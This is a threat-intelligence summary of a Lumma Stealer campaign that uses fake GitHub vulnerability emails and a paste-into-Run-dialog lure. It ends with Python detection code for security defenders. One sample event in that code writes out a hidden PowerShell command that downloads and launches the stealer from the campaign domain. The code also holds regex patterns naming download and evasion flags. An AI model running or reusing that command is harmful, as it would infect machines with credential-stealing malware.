Lumma Stealer spread through fake security vulnerability notifications about the recipient's own GitHub project.

Attackers use a newly registered domain to send spoofed “GitHub Security Team” emails that direct recipients to a page that tricks them into executing a PowerShell payload via the Windows Run dialog. The payload downloads and runs an executable (Lumma Stealer) that harvests credentials and personal data; the campaign details and IoCs are published by CERT-AGID. #LummaStealer #github-scanner.com

Keypoints

  • Spoofed emails claim a repository vulnerability and point recipients to a malicious domain (github-scanner.com).
  • The landing page instructs users to press Windows+R, Ctrl+V, Enter to paste and execute a JavaScript-supplied PowerShell command.
  • The PowerShell script downloads an executable named l6E.exe, which is renamed locally to SysSetup.exe and executed.
  • The downloaded payload is identified as Lumma Stealer, designed to exfiltrate login credentials and personal information.
  • If C2 domains are unreachable, the malware attempts to retrieve data from Steam community profiles as a fallback (C2 info is encrypted).
  • CERT-AGID published IoCs and a downloadable JSON feed for detection and response.

MITRE Techniques

  • [T1059.001] PowerShell – Execution of malicious PowerShell code to download and run the payload. Quote: ‘the task of the script is to release the PowerShell code described in the constant captchaText and executed through the subsequent commands: Windows+R, Ctrl+V, and Enter.’
  • [T1555.003] Credentials from Web Browsers – Harvesting of stored login credentials and personal data by the stealer. Quote: ‘designed to steal sensitive information from users, including login data and personal information.’
  • [T1071.001] Application Layer Protocol: Web Protocols – Communication with command-and-control domains and fallback retrieval via web resources (Steam profiles). Quote: ‘If the malware fails to connect to its list of C2 domains, a routine is activated to obtain information from Steam community profiles.’

Indicators of Compromise

  • [Domain] distribution and phishing infrastructure – github-scanner.com
  • [File names] payload and local rename – l6E.exe, SysSetup.exe
  • [IoC feed] published indicators (JSON) – https://cert-agid.gov.it/wp-content/uploads/2024/09/github-scanner_lumma_18-09-2024.json
  • [C2] command-and-control – C2 URLs delivered in encrypted form (not listed in the report) and a fallback routine that retrieves C2 information from Steam community profiles

In this campaign, attackers send spoofed emails that impersonate the GitHub Security Team and link to a freshly registered domain (github-scanner.com). The landing page displays a deceptive prompt asking users to press Windows+R, Ctrl+V, and Enter; these keystrokes open the Run dialog, paste a JavaScript-provided payload (stored in a variable named captchaText), and execute it, triggering a PowerShell command.

The executed PowerShell downloads an executable named l6E.exe, renames it locally to SysSetup.exe, and launches it. That executable is Lumma Stealer, which is instrumented to collect stored credentials and sensitive personal information. If initial attempts to reach its list of C2 domains fail, the malware activates a fallback routine that retrieves C2/configuration data from Steam community profiles; the C2 URLs in this campaign are delivered in encrypted form.
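As an added example (not code from the CERT-AGID report), the following Python runs two kinds of checks over process-creation telemetry: a behavioural rule for the Run-dialog paste-and-run pattern described above (PowerShell spawned by explorer.exe with a download primitive on its command line) and the report's IoCs (the github-scanner.com domain and the l6E.exe / SysSetup.exe file names). The sample events, the user name and the local paths are constructed for illustration.

```python
import re

# Constructed sample process-creation events (Sysmon EID 1 / Security 4688 style).
# They are not from the CERT-AGID report; only the domain and file names are the page's IoCs.
SAMPLE_EVENTS = [
    {   # Windows+R lure: PowerShell spawned by explorer.exe fetching the payload from the campaign domain
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell -w hidden -c "iwr https://github-scanner.com/l6E.exe -OutFile $env:TEMP\SysSetup.exe; start $env:TEMP\SysSetup.exe"',
    },
    {   # Second stage: the renamed payload running from the user's temp folder
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "Image": r"C:\Users\alice\AppData\Local\Temp\SysSetup.exe",
        "CommandLine": r"C:\Users\alice\AppData\Local\Temp\SysSetup.exe",
    },
    {   # Benign: an admin running PowerShell from cmd.exe with no download primitive
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell Get-Service -Name Spooler",
    },
]

CAMPAIGN_DOMAIN = "github-scanner.com"        # phishing/distribution domain from the report
CAMPAIGN_FILES = ("l6e.exe", "syssetup.exe")  # downloaded name and local rename from the report
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|\bcurl\b|\bwget\b|start-bitstransfer", re.I)
EVASION_RE = re.compile(r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop\b|-ep\s+bypass", re.I)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> list:
    """Return the labels that fire for one event: one behavioural rule plus the report's IoCs."""
    image, parent, cmd = basename(event["Image"]), basename(event["ParentImage"]), event["CommandLine"]
    hits = []
    # Behavioural rule: PowerShell whose parent is explorer.exe (how a Run-dialog launch appears)
    # and whose command line carries a download primitive, i.e. the paste-and-run pattern itself.
    if image in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" and DOWNLOAD_RE.search(cmd):
        hits.append("run-dialog-powershell-download")
        if EVASION_RE.search(cmd):
            hits.append("hidden-window-or-bypass-flags")
    # IoC rules: the campaign domain and the two payload file names, in the image path or command line.
    if CAMPAIGN_DOMAIN in cmd.lower():
        hits.append("ioc-domain:" + CAMPAIGN_DOMAIN)
    for name in CAMPAIGN_FILES:
        if image == name or name in cmd.lower():
            hits.append("ioc-file:" + name)
    return hits

def scan(events: list) -> dict:
    # Map each alerting event's index to its labels; silent events are omitted.
    return {i: labels for i, e in enumerate(events) if (labels := classify(e))}
```

The behavioural rule fires on the lure pattern even if the campaign rotates its domain or file names, while the IoC rules give a high-confidence match for this specific campaign.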

For detection and response, CERT-AGID has published the observed indicators and a downloadable IoC JSON feed containing the campaign details and artifacts used in distribution and execution. Read more: https://cert-agid.gov.it/news/lumma-stealer-diffuso-tramite-notifica-di-falsa-vulnerabilita-di-sicurezza-sul-proprio-progetto-github/